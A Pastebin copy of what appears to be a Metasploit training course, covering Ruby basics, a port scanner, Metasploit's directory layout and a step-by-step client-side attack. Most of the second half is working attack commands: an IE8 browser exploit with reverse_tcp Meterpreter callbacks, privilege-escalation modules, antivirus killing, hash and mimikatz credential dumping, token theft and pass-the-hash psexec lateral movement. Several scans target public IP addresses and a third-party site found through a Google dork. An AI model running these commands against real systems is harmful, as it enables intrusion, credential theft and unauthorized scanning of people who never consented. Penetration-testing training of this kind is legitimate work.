SHARE
TWEET

Untitled

djtroby May 31st, 2017 56 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Metasploit Next Level
  2.  
  3.  
  4. ##########################
  5. # Download the attack VM #
  6. ##########################
  7. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
  8. user: strategicsec
  9. pass: strategicsec
  10.  
  11. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
  12. user: strategicsec
  13. pass: strategicsec
  14.  
  15.  
  16. ###########################
  17. # Download the victim VMs #
  18. ###########################
  19. https://s3.amazonaws.com/StrategicSec-VMs/Windows7.zip
  20. user: workshop
  21. pass: password
  22.  
  23. https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
  24.  
  25. user: administrator
  26. pass: strategicsec
  27.  
  28.  
  29.  
  30.  
  31.  
  32. ############################################################
  33. # Section 1: Ruby Fundamentals and Metasploit Architecture #
  34. ############################################################
  35.  
  36. ################################
  37. # Chapter 1: Ruby Fundamentals #
  38. ################################
  39.  
  40.  
  41.  
  42. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  43. scientist and programmer from Japan. It is a cross-platform dynamic language.
  44.  
  45. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  46. on Rails is a framework that is written in Ruby.
  47.  
  48. - Ruby's file name extensions are .rb and .rbw.
  49.  
  50. - official website of this
  51.  
  52. - language: www.ruby-lang.org.
  53.  
  54.  
  55. - interactive Shell called Ruby Shell
  56.  
  57.  
  58. - Installing and Running IRB
  59.  
  60.  
  61. sudo apt-get install ruby2,2,2 ruby2,2,2-dev irb rdoc ri
  62.  
  63.  
  64. - open up the interactive console and play around.
  65.  
  66.  
  67. irb
  68.  
  69.  
  70.  
  71. - Math, Variables, Classes, Creating Objects and Inheritance
  72.  
  73.  
  74. #following arithmetic operators:
  75. Addition operator (+) — 10 + 23
  76. Subtraction operator (-) — 1001 - 34
  77. Multiplication operator (*) — 5 * 5
  78. Division operator (/) — 12 / 2
  79.  
  80.  
  81.  
  82. #Now let’s cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  83. operator. ‘=’ is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  84. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  85.  
  86. x = 25
  87. x + 30
  88. y = 69
  89. y+33
  90.  
  91.  
  92.  
  93.  
  94. - Let’s look at creating classes and creating objects.
  95.  
  96. - Here, the name of the class is Strategicsec. An object has its properties and methods.
  97.  
  98.  
  99.  
  100. class Attack
  101. attr_accessor :of, :sqli, :xss
  102. end
  103.  
  104. #Now that we have created the classes let’s create the objects
  105.  
  106. first_attack = Attack.new
  107. first_attack.of = "stack"
  108. first_attack.sqli = "blind"
  109. first_attack.xss = "dom"
  110. puts first_attack.of
  111. puts first_attack.sqli
  112. puts first_attack.xss
  113.  
  114.  
  115.  
  116.  
  117.  
  118. - Let’s work on some inheritance that will help make your programming life easier. When we have multiple classes,
  119. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  120. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  121. programming life easier by maximizing code reuse.
  122.  
  123.  
  124.  
  125. class Exploitframeworks
  126. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  127. end
  128. class Metasploit < Exploitframeworks
  129. end
  130. class Canvas < Exploitframeworks
  131. end
  132. class Coreimpact < Exploitframeworks
  133. end
  134. class Saint < Exploitframeworks
  135. end
  136. class Exploitpack < Exploitframeworks
  137. end
  138.  
  139.  
  140.  
  141.  
  142.  
  143. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  144.  
  145. - Let’s create a simple method. A method is used to perform an action and is generally called with an object.
  146.  
  147. - Here, the name of the method is ‘learning’. This method is defined inside the Msfnl class. When it is called,
  148. it will print this string: “We are Learning how to PenTest”
  149.  
  150. - An object named ‘bo’ is created, which is used to call the method.
  151.  
  152.  
  153.    
  154. class Msfnl
  155. def learning
  156. puts “We are Learning how to PenTest”
  157. end
  158. end
  159.  
  160. #Now let’s define an object for our Method
  161.  
  162. joe = Msfnl.new
  163. joe.learning
  164.  
  165.  
  166.  
  167.  
  168. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  169. calling the puts() function, we are sending a string value to the function. This string value is used by the
  170. function to perform some particular operations.
  171.  
  172. puts (“Pentesting”)
  173.  
  174.  
  175. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  176. explain some useful string functions with an example.
  177.  
  178. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  179. reverse function reverses a string. The following example demonstrates how to use the string functions.
  180.  
  181. 55.class
  182. "I Love Programming".class
  183. "I Love Pentesting".length
  184. "Pown that box".upcase
  185. "Love" + "To Root Boxes"
  186. "evil".reverse
  187. "evil".reverse.upcase
  188.  
  189.  
  190.  
  191. -  expressions and shortcuts. In the below example, ‘a’ is an operand, ‘3’ is an operand,  ‘=’ is
  192. an operator, and ‘a=3’ is the expression. A statement consists of one or multiple expressions. Following are the
  193. examples of some expressions.
  194.  
  195. a = 3
  196. b = 6
  197. a+b+20
  198. d = 44
  199. f = d
  200. puts f
  201.  
  202.  
  203.  
  204.  
  205.  
  206.  
  207. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  208. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  209. statements to understand the shortcuts.
  210.  
  211. g = 70
  212. g = g+44
  213. g += 33
  214.  
  215. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  216.  
  217. g *= 3
  218.  
  219. - In the above statement, g is multiplied with 3 and then assigned to g.
  220.  
  221. - Example
  222.  
  223. - Comparison Operators, Loops, Data Types, and Constants
  224.  
  225. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  226. how to use the following comparison operators.
  227. ‘Less than’ operator (<): This operator is used to check whether a variable or constant is less than another
  228. variable or constant. If it’s less than the other, the ‘less than’ operator returns true.
  229. ‘Equal to’ operator (==): This operator is used to check whether a variable or constant is equal to another variable
  230. or constant. If it’s equal to the other, the ‘equal to’ operator returns true.
  231. ‘Not equal to’ operator (!=): This operator is used to check whether a variable or constant is not equal to another
  232. variable or constant. If it’s not equal to the other, the ‘not equal to’ operator returns true.
  233.  
  234.  
  235. numberofports = 55
  236. puts "number of ports found during scan" if numberofports < 300
  237. numberofports = 400
  238. puts "number of ports found during scan" if numberofports < 300
  239. puts "number of ports found during scan" if numberofports == 300
  240. puts "number of ports found during scan" if numberofports != 300
  241. Example
  242.  
  243.  
  244. - the ‘OR’ operator and the ‘unless’ keyword. This symbol ‘||’ represents the logical ‘OR’ operator.
  245.  
  246. - This operator is generally used to combine multiple conditions.
  247. - In case of two conditions, if both or any of the conditions is true, the ‘OR’operator returns true. Consider the
  248.  
  249. - following example to understand how this operator works.
  250.  
  251. ports = 100
  252. puts "number of ports found on the network" if ports<100 || ports>200
  253. puts "number of ports found on the network" if ports<100 || ports>75
  254. #unless
  255. portsbelow1024 = 50
  256. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  257. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  258. puts "If the ports are below 1024" unless portsbelow1024 < 20
  259.  
  260.  
  261. - The ‘unless’ keyword is used to do something programmatically unless a condition is true.
  262.  
  263.  
  264.  
  265. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  266.  
  267. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  268.  
  269. 10.times do puts "strategicsec" end
  270. #Or use the curly braces
  271. 10.times {puts "strategicsec"}
  272.  
  273.  
  274.  
  275. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  276. working with different data types. Data type conversion is also known as type casting.
  277.  
  278.  
  279.  
  280. - In the following example, a and b are integers. So when a is divided by b, an integer division is performed. As a
  281. result, 23/25 becomes 0.
  282.  
  283. - On the other hand, the integer variables c and d are converted to float. So the division gives the result in decimal
  284. points.
  285.  
  286. 24/4
  287. 14.0/5.0
  288. a = 23
  289. b = 25
  290. print a/b
  291. c = 26
  292. d = 33
  293. print c.to_f/d.to_f
  294.  
  295.  
  296.  
  297.  
  298. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  299. change the value of a constant, you will see a warning message.
  300.  
  301.  
  302.  
  303.  
  304. - Multiple Line String Variable, Interpolation, and Regular Expressions
  305.  
  306. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  307.  
  308. strategicsec = <<mark
  309. welcome
  310. to the
  311. best
  312. metasploit
  313. course
  314. on the
  315. market
  316. mark
  317. puts strategicsec
  318.  
  319.  
  320.  
  321. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  322. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  323. Examine the following example to understand how interpolation works in Ruby.
  324.  
  325.  
  326.  
  327. a = 4
  328. b = 6
  329. puts “a * b = a*b”
  330. puts “ #{a} * #{b} = #{a*b} “
  331. person = “Joe McCray”
  332. puts “IT Security consultant person”
  333. puts “IT Security consultant #{person}”
  334.  
  335. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  336.  
  337.  
  338. - Regular expression is a powerful technique for text searching and text manipulation. Ruby provides built-in support
  339. for regular expressions through the Regexp class. So the regular expressions in Ruby are the objects of Regexp type.
  340.  
  341.  
  342.  
  343. - In regular expressions, we define patterns to perform text search and advanced text manipulations. String literals
  344. and metacharacters constitute a pattern. // characters mark the beginning and end of a pattern in Ruby.
  345. The following example shows how the substring “today”
  346. is placed in the main string.
  347.  
  348. a = "Woot Woot, we are learning regular expressions!!"
  349. puts a.sub(/^..../, 'Today')
  350. puts a.sub(/^..../, 'Today')
  351.  
  352.  
  353.  
  354. - Let’s Loop the expressions. This example shows how to loop the expressions.
  355.  
  356. a.scan(/...../) {|w| puts w}
  357. a.scan(/\S\S/) {|w| puts w}
  358.  
  359.  
  360.  
  361. - Character classes
  362.  
  363. strategicsec = "I Scanned 45 hosts and found 500 vulnerabilities"
  364. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  365. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  366.  
  367.  
  368.  
  369. - Arrays, Push and Pop, and Hashes
  370.  
  371.  
  372. - In the following example, numbers is an array that holds 6 integer numbers.
  373.  
  374.  
  375.  
  376. numbers = [2,4,6,8,10,100]
  377. puts numbers[0]
  378. puts numbers[4]
  379. numbers[2] = 150
  380. puts numbers
  381.  
  382.  
  383.  
  384.  
  385. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  386.  
  387.  
  388.  
  389. framework = []
  390. framework << "modules"
  391. framework << "exploits"
  392. framework << "payloads"
  393. framework.pop
  394.  
  395.  
  396. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  397. that is used to access the element.
  398.  
  399.  
  400. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  401. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  402. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  403.  
  404.  
  405. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  406. print metasploit.size
  407. print metasploit["microsoft"]
  408. metasploit['microsoft'] = 'redhat'
  409. print metasploit['microsoft']
  410.  
  411.  
  412.  
  413. - Writing Ruby Scripts
  414.  
  415.  
  416. - Let’s take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  417. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  418. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  419.  
  420. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  421. ls
  422. ack.rb  ftpbounce.rb  syn.rb  tcp.rb  xmas.rb
  423.  
  424. - Lets look at tcp.rb
  425.    
  426.  
  427.  
  428. - Let’s take the time now to create and design our own port scanner what we will design here is a port scanner that
  429. will scan for port up to 0-1024. And we will add a function in there for the port scanner to prompt us stating OPEN
  430. port if it detects it. This is a pretty basic script, but it will help you in the event that you need to write
  431. something on the fly.
  432.  
  433.  
  434.  
  435. - PortScanner.rb :
  436.  
  437. require 'socket'
  438. require 'timeout'
  439.  
  440. puts "Enter IP Address to Scan:"
  441. ipaddress = gets
  442.  
  443. 1.upto(1024) {|port|
  444.   begin
  445.     timeout(5) do
  446.       TCPSocket.open(ipaddress.chop, port)
  447.     end
  448.     puts "Response/Port Open: #{port}"
  449.   rescue Timeout::Error
  450.     # uncomment the following line to show closed ports (noisy!)
  451.     #puts "No Response /Port closed: #{port}"
  452.   rescue
  453.     # uncomment the following line to show closed ports (noisy!)
  454.     #puts "No Response /Port closed: #{port}"
  455.   end
  456. }
  457.  
  458.  
  459.  
  460.  
  461.  
  462.  
  463.  
  464.  
  465. ######################################
  466. # Chapter 2: Metasploit Fundamentals #
  467. ######################################
  468.  
  469. - Let’s take a little look at Metasploit Framework
  470.  
  471. - First, we should take note of the different directories, the Modular Architecture.
  472.  
  473. The modules that make up the Modular Architecture are
  474. Exploits
  475. Auxiliary
  476. Payload
  477. Encoder
  478. Nops
  479.  
  480.  
  481. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  482.  
  483. are
  484.  
  485. Modules
  486. Scripts
  487. Plugins
  488. External
  489. Data
  490. Tools
  491.  
  492. - Let's take a look inside the Metasploit directory and see what's the
  493.  
  494. cd ~/toolz/metasploit
  495. ls
  496.  
  497.  
  498.  
  499.  
  500. - Now let's take a look inside the Modules directory and see what's there.
  501.  
  502. cd ~/toolz/metasploit/modules
  503. ls
  504.  
  505.  
  506.        
  507. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  508. not necessarily need to - have a shell or session started on a machine.
  509.  
  510. The exploits directory has our modules that we need to pop a shell on a box.
  511. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  512. like Burp Suite
  513. - Let’s take a look at the external directory
  514.  
  515. cd ~/toolz/metasploit/external
  516. ls
  517.  
  518.  
  519. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  520.  
  521. cd ~/toolz/metasploit/data
  522. ls
  523.  
  524.  
  525. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  526. brute-forcing
  527.  
  528. cd ~/toolz/metasploit/data/wordlists
  529. ls
  530.    
  531.  
  532. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  533. once a session is created.
  534.  
  535. cd ~/toolz/metasploit/data/meterpreter
  536. ls
  537.  
  538.  
  539. - In our case, the dll's are at
  540.  
  541. '~/.rvm/gems/ruby-2.1.5@metasploit-framework/gems/meterpreter_bins-0.0.13/meterpreter/'
  542.  
  543. ls ~/.rvm/gems/ruby-2.1.5@metasploit-framework/gems/meterpreter_bins-0.0.13/meterpreter/
  544.  
  545. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  546. like escalating privileges and dumping hashes.
  547.  
  548. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  549. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  550. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  551. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  552. custom shellcode.
  553.  
  554. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  555. to do with other programs to make things like importing and exporting reports simple.
  556. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  557. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  558. modules we're going to have a better understanding of where everything needs to go.
  559.  
  560. cd ~/toolz/metasploit/modules/exploits
  561. ls
  562.  
  563.  
  564.  
  565. - The exploits directory is split up into several different directories, each one housing exploits for different types
  566. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  567. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  568. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  569. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  570. for us.
  571.  
  572. cd ~/toolz/metasploit/modules/auxiliary/
  573. ls
  574.      
  575.  
  576.  
  577. - And a little further into the directory, let's take a look at what's in the scanner directory
  578.  
  579. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  580. ls
  581.  
  582. - And one more folder deeper into the structure, let's take a look in the portscan folder
  583.  
  584. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  585. ls
  586.    
  587.  
  588. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  589. and report them back to us in a nice, easily readable format.
  590.  
  591. cat tcp.rb
  592.    
  593.  
  594.  
  595. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  596. once you have a session on a machine.
  597. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  598. succeeds.
  599.  
  600. cd ~/toolz/metasploit/modules/payloads/
  601. ls
  602.    
  603.  
  604.  
  605. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  606. application for it to be used as.
  607. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  608. do everything once you have that shell calling back to you.
  609. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  610. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  611. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  612. to download Stages payloads.
  613.  
  614.  
  615. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  616. shells.
  617.  
  618. cd singles
  619. cd windows
  620. ls
  621.  
  622.  
  623.  
  624. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  625. see what it actually does.
  626.  
  627. cat adduser.rb
  628.  
  629. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  630. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  631. it gives Windows to add the user to the system.
  632.  
  633.  
  634. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  635.  
  636. windows/shell/bind_tcp or windows/shell/reverse_tcp
  637.  
  638. cd ../../stagers
  639. ls
  640.    
  641.  
  642.  
  643. - Again, we can see that we have stagers for multiple systems and code types.
  644.  
  645. ls windows/
  646.    
  647.  
  648.  
  649. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  650. machine, so we can upload or download our stage payloads and execute commands.
  651. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  652. our stagers...
  653.  
  654. cd ../stages
  655. ls
  656.    
  657.  
  658.  
  659. Again, we can see that our stages are coded for particular operating systems and languages.
  660. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  661. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  662. if any.
  663.  
  664. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  665. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  666. so we can impersonate other users on the system in hopes of elevating our privileges.
  667.  
  668. cd ../../../post/
  669. ls
  670. cd windows/
  671. ls
  672.    
  673.  
  674.  
  675. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  676. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  677. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  678. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  679. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  680.  
  681. ##################
  682. # Day 1 Homework #
  683. ##################
  684. Please take screenshots of you doing the first 10 videos in this playlist
  685. https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
  686.  
  687. ###################################################
  688. # Section 2: Actually Using Metasploit (For real) #
  689. ###################################################
  690.  
  691. sudo /sbin/iptables -F
  692.  
  693. cd ~/toolz/metasploit
  694.  
  695. ./msfconsole
  696.  
  697. ##############################################
  698. # Run any Linux command inside of MSFConsole #
  699. ##############################################
  700. ls
  701.  
  702. pwd
  703.  
  704. ping -c1 yahoo.com
  705.  
  706. nmap 192.168.153.163
  707.  
  708. nmap yahoo.com
  709.  
  710.  
  711.  
  712. -------------------------------
  713. - You're on the outside scanning publicly accessable targets.
  714.  
  715.  
  716.  
  717. use auxiliary/scanner/portscan/tcp
  718.  
  719. set RHOSTS 54.69.156.253
  720.  
  721. set PORTS 80,1433,1521,3306,8000,8080,8081,10000                      
  722.  
  723. run
  724.  
  725. -------------------------------
  726. use auxiliary/scanner/http/     (press the tab key, then press y to look through the http options)
  727.  
  728.  
  729. - Here is an example:
  730. use auxiliary/scanner/http/trace_axd
  731.  
  732.         - So let's do a quick google search for someone with trace.axd file
  733.         - filetye:axd inurl:trace.axd
  734.  
  735. set RHOSTS 52.10.254.211
  736.  
  737. set VHOST endlessvacation.com
  738.  
  739. run
  740.  
  741. -------------------------------
  742.  
  743.  
  744. use auxiliary/scanner/http/http_version                
  745.  
  746. set RHOSTS 54.69.156.253
  747.  
  748. set RPORT 8081
  749.  
  750. run
  751.  
  752.  
  753. -------------------------------
  754.  
  755. use auxiliary/scanner/http/tomcat_enum                  
  756.  
  757. set RHOSTS 54.69.156.253
  758.  
  759. set RPORT 8081
  760.  
  761. run
  762.  
  763.  
  764.  
  765. -------------------------------
  766. - In my opinion a much better option is a script called 'discover' from Lee Baird.
  767.  
  768. - You can get it here: https://github.com/leebaird/discover
  769.  
  770. - On the Ubuntu attack host you can run discover by typing the following:
  771. cd ~/toolz/discover
  772. sudo ./discover
  773.  
  774.  
  775. - From here you can just follow the prompts. It will run both Nmap NSE scripts and Metasploit aux modules with all of the correct parameters for you.
  776.  
  777.  
  778. ##################################
  779. # Basic Client-Side Exploitation #
  780. ##################################
  781.  
  782. echo j0e-r0x > /home/strategicsec/j0e-r0x.txt                   (You can of course replace j0e-r0x with yourname)
  783.  
  784. sudo /sbin/iptables -F
  785.  
  786. cd ~/toolz/metasploit
  787.  
  788. ./msfconsole
  789.  
  790. use exploit/windows/browser/ie_cgenericelement_uaf
  791.  
  792. set ExitOnSession false
  793.  
  794. set URIPATH /ie8
  795.  
  796. set PAYLOAD windows/meterpreter/reverse_tcp
  797.  
  798. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  799.  
  800. exploit -j
  801.  
  802.  
  803. - Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
  804. - given to you by metasploit.
  805.  
  806. - The address will be something like:
  807.  
  808. http://192.168.153.164:8080/ie8                                            (Make sure you change this to your ubuntu ip address)
  809.  
  810.  
  811.  
  812. - This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.
  813.  
  814.  
  815. ###########################
  816. # Client-Side Enumeration #
  817. ###########################
  818.  
  819.  
  820. - You can list the active sessions by typing:
  821.  
  822. sessions -l
  823.  
  824.  
  825.  
  826.  
  827. - You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
  828.  
  829.  
  830. sessions -i 1
  831.  
  832.  
  833.  
  834.  
  835.  
  836. - You should now see Metasploit's meterpreter prompt.
  837.  
  838.  
  839. ********************************** Figure out who and where you are **********************************
  840.  
  841. meterpreter> sysinfo
  842.  
  843.  
  844. meterpreter> getuid
  845.  
  846.  
  847. meterpreter> ipconfig
  848.  
  849.  
  850. meterpreter> run post/windows/gather/checkvm
  851.  
  852.  
  853. meterpreter> run get_local_subnets
  854.  
  855.  
  856.  
  857. ********************************** Escalate privileges and get hashes **********************************
  858.  
  859.  
  860. meterpreter> use priv
  861.  
  862.  
  863. --Option 1: GetSystem
  864. meterpreter> getsystem
  865.  
  866. --Option 2:
  867. meterpreter > run post/windows/escalate/getsystem
  868.  
  869. --Option 3:
  870. meterpreter> background
  871. back
  872. use post/windows/escalate/droplnk
  873. set SESSION 1
  874. set PAYLOAD windows/meterpreter/reverse_tcp
  875. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  876. set LPORT 1234
  877. exploit
  878.  
  879. --Option 4:
  880. use exploit/windows/local/bypassuac
  881. set SESSION 1
  882. set PAYLOAD windows/meterpreter/reverse_tcp
  883. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  884. set LPORT 12345
  885. exploit
  886.  
  887. --Option 5:
  888. use exploit/windows/local/service_permissions
  889. set SESSION 1
  890. set PAYLOAD windows/meterpreter/reverse_tcp
  891. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  892. set LPORT 5555
  893. exploit
  894.  
  895. --Option 6:
  896. use exploit/windows/local/trusted_service_path
  897. set SESSION 1
  898. set PAYLOAD windows/meterpreter/reverse_tcp
  899. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  900. set LPORT 4567
  901. exploit
  902.  
  903.  
  904. --Option 7:
  905. use exploit/windows/local/ppr_flatten_rec
  906. set SESSION 1
  907. set PAYLOAD windows/meterpreter/reverse_tcp
  908. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  909. set LPORT 7777
  910. exploit
  911.  
  912. --Option 8:
  913. use exploit/windows/local/ms_ndproxy
  914. set SESSION 1
  915. set PAYLOAD windows/meterpreter/reverse_tcp
  916. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  917. set LPORT 7788
  918. exploit
  919.  
  920.  
  921. --Option 9:
  922. use exploit/windows/local/ask
  923. set SESSION 1
  924. set PAYLOAD windows/meterpreter/reverse_tcp
  925. set LHOST 192.168.153.164                                            (Make sure you change this to your ubuntu ip address)
  926. set LPORT 7799
  927. exploit
  928.  
  929.  
  930. meterpreter > getuid
  931. Server username: win7-64-victim\Workshop
  932. meterpreter > getsystem
  933. ...got system (via technique 1).
  934. meterpreter > getuid
  935. Server username: NT AUTHORITY\SYSTEM
  936.  
  937. --------------------------------------------------------
  938.  
  939. meterpreter> run killav
  940.  
  941. meterpreter> run post/windows/gather/hashdump
  942.  
  943. meterpreter > ps                (search for a process running as NT AUTHORITY\SYSTEM)
  944.  
  945. meterpreter > migrate 2800      (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
  946.  
  947. meterpreter> run post/windows/gather/credentials/credential_collector
  948.  
  949.  
  950. ********************************** Steal Tokens **********************************
  951.  
  952. meterpreter > getsystem
  953.  
  954. meterpreter > use incognito
  955.  
  956. meterpreter > list_tokens -u
  957.  
  958. meterpreter > list_tokens -g
  959.  
  960. meterpreter > impersonate_token                         <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  961.  
  962. meterpreter> getuid
  963.  
  964.  
  965. ************ Stealing credentials and certificates ************
  966. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  967.  
  968. meterpreter > getsystem
  969.  
  970. meterpreter > load mimikatz
  971.  
  972. meterpreter > kerberos
  973.  
  974. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  975.  
  976. meterpreter > msv                                                               <-- Your AD password
  977.  
  978. meterpreter > livessp                                                           <-- Your Windows8 password
  979.  
  980. meterpreter > ssp                                                               <-- Your outlook password
  981.  
  982. meterpreter > tspkg                                                             <-- Your AD password
  983.  
  984. meterpreter > wdigest                                                           <-- Your AD password
  985.  
  986. meterpreter > mimikatz_command -f crypto::listStores
  987.  
  988. meterpreter > mimikatz_command -f crypto::listCertificates
  989.  
  990. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  991.  
  992. meterpreter > mimikatz_command -f crypto::patchcapi
  993.  
  994. meterpreter> search -d <directory> -f <file-pattern>
  995.  
  996.  
  997. ********************************** Enumerate the host you are on **********************************
  998.  
  999. meterpreter > run getcountermeasure
  1000.  
  1001. meterpreter> run winenum
  1002.  
  1003. meterpreter > run post/windows/gather/enum_applications
  1004.  
  1005. meterpreter > run post/windows/gather/enum_logged_on_users
  1006.  
  1007. meterpreter > run post/windows/gather/usb_history
  1008.  
  1009. meterpreter > run post/windows/gather/enum_shares
  1010.  
  1011. meterpreter > run post/windows/gather/enum_snmp
  1012.  
  1013. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1014.  
  1015.  
  1016. ********************************** Prove access **********************************
  1017.  
  1018. meterpreter> upload /home/strategicsec/j0e-r0x.txt c:\\
  1019.  
  1020.  
  1021.  
  1022. ********************************** Lateral Movement *******************************
  1023.  
  1024.  
  1025. Now we can run the PSEXEC exploit.
  1026. -- Option 1:
  1027. use exploit/windows/smb/psexec
  1028.  
  1029. set SMBUser Workshop
  1030.  
  1031. set SMBPass password
  1032.  
  1033. set RHOST 192.168.153.163
  1034.  
  1035. set payload windows/meterpreter/reverse_tcp
  1036.  
  1037. set LHOST 192.168.153.164
  1038.  
  1039. set LPORT 2345
  1040.  
  1041. exploit
  1042.  
  1043.  
  1044.  
  1045.  
  1046. -- Option 2:
  1047. use exploit/windows/smb/psexec
  1048.  
  1049. set SMBUser Workshop
  1050.  
  1051. set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
  1052.  
  1053. set payload windows/meterpreter/reverse_tcp
  1054.  
  1055. set RHOST 192.168.153.163                      
  1056.  
  1057. set LHOST 192.168.153.164
  1058.  
  1059. set LPORT 5678
  1060.  
  1061. exploit
  1062.  
  1063.  
  1064. #####################
  1065. # Fix broken PSExec #
  1066. #####################
  1067. - We use the shell command to get to the Victim Dos command so we can add a registry field.
  1068.  
  1069. meterpreter > execute -c -H -f cmd -a "/k" -i
  1070. reg /?
  1071.  
  1072.  
